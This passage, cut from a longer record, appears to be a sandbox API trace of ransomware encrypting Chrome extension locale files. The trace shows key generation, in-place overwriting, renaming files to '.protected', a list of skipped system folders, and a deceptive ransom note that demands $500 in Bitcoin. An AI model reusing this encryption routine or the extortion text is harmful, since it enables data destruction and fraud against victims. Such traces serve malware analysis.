Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.protected") returned 169 [0081.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.protected")) returned 1 [0081.228] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.228] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.228] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\RESTORE_FILES.txt") returned 163 [0081.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.229] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.229] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.230] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.230] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.230] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.230] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.230] CloseHandle (hObject=0x164) returned 1 [0081.230] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0081.230] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0081.230] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk") returned 145 [0081.230] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0081.230] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0081.230] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*") returned 147 [0081.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.231] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.231] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.231] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.231] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\.") returned 147 [0081.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0081.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\..") returned 148 [0081.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.231] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.232] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.232] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.232] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.233] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.233] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0081.233] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.233] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x315, lpOverlapped=0x0) returned 1 [0081.242] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffceb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.242] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x315, 
lpOverlapped=0x0) returned 1 [0081.242] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.242] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.243] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.243] CloseHandle (hObject=0x168) returned 1 [0081.243] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.protected") returned 169 [0081.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.protected")) returned 1 [0081.244] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.244] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) 
returned 1 [0081.244] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\RESTORE_FILES.txt") returned 163 [0081.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.245] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.245] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.246] lstrlenA (lpString="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") returned 684 [0081.246] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.246] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.246] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.246] CloseHandle (hObject=0x164) returned 1 [0081.246] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.246] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0081.247] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi") returned 145 [0081.247] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0081.247] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0081.247] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*") returned 147 [0081.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.247] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\.") returned 147 [0081.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.247] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.248] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.248] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.248] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\..") returned 148 [0081.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.248] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.248] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.248] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.248] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.249] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.249] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.249] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.249] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2d0, lpOverlapped=0x0) returned 1 [0081.251] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.251] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2d0, lpOverlapped=0x0) returned 1 [0081.251] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.251] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.251] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.251] CloseHandle (hObject=0x168) returned 1 [0081.252] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.protected") returned 169 [0081.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.protected")) returned 1 [0081.253] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.253] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.253] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 